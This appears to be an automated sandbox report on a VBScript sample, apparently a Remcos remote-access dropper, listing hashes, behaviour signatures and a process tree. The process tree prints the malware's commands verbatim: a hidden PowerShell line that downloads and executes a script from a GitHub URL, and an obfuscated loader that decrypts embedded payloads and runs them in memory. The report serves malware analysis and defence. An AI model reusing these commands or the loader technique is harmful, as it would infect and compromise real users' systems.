Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-12-2024 22:47
Static task
static1
Behavioral task
behavioral1
Sample
ETL3M_remcos.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ETL3M_remcos.vbs
Resource
win10v2004-20241007-en
General
-
Target
ETL3M_remcos.vbs
-
Size
563KB
-
MD5
f7c17bfb4247e64e22dd52540a4b903b
-
SHA1
368ba4d02df294fa42efee5e4f330d5e7260d0c3
-
SHA256
23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622
-
SHA512
5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4
-
SSDEEP
12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid Process 2964 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2188 powershell.exe 2964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.execmd.execmd.exedescription pid Process procid_target PID 1344 wrote to memory of 2188 1344 WScript.exe 28 PID 1344 wrote to memory of 2188 1344 WScript.exe 28 PID 1344 wrote to memory of 2188 1344 WScript.exe 28 PID 1344 wrote to memory of 668 1344 WScript.exe 32 PID 1344 wrote to memory of 668 1344 WScript.exe 32 PID 1344 wrote to memory of 668 1344 WScript.exe 32 PID 668 wrote to memory of 2796 668 cmd.exe 34 PID 668 wrote to memory of 2796 668 cmd.exe 34 PID 668 wrote to memory of 2796 668 cmd.exe 34 PID 2796 wrote to memory of 2892 2796 cmd.exe 36 PID 2796 wrote to memory of 2892 2796 cmd.exe 36 PID 2796 wrote to memory of 2892 2796 cmd.exe 36 PID 2796 wrote to memory of 2964 2796 cmd.exe 37 PID 2796 wrote to memory of 2964 2796 cmd.exe 37 PID 2796 wrote to memory of 2964 2796 cmd.exe 37 PID 2796 wrote to memory of 2964 2796 cmd.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ETL3M_remcos.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "4⤵PID:2892
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
562KB
MD5d1d99208a499e870e1e0a34a2cbba829
SHA185f7090ce76bdae0a07154b27117ec5ac9e9f673
SHA256d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879
SHA512badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LSBTZU62H2JS0QL4K0Y9.temp
Filesize7KB
MD55017493d4117071e40b0ebdcfc586969
SHA1e239bbfdcda139cb1eedcbe2b71f791312614c72
SHA256360c61699a4cda2c942a7b972208cb1c319e173718db5da976c82764c6b5b2d1
SHA512bde52cef83a8fb040038f8f1f8d648113683fd2ea3464cdf074bcce8ab078454d502bb1e07d69feeb52cbfabf2cfed4924182a3c6767cc7a861918faaec6903f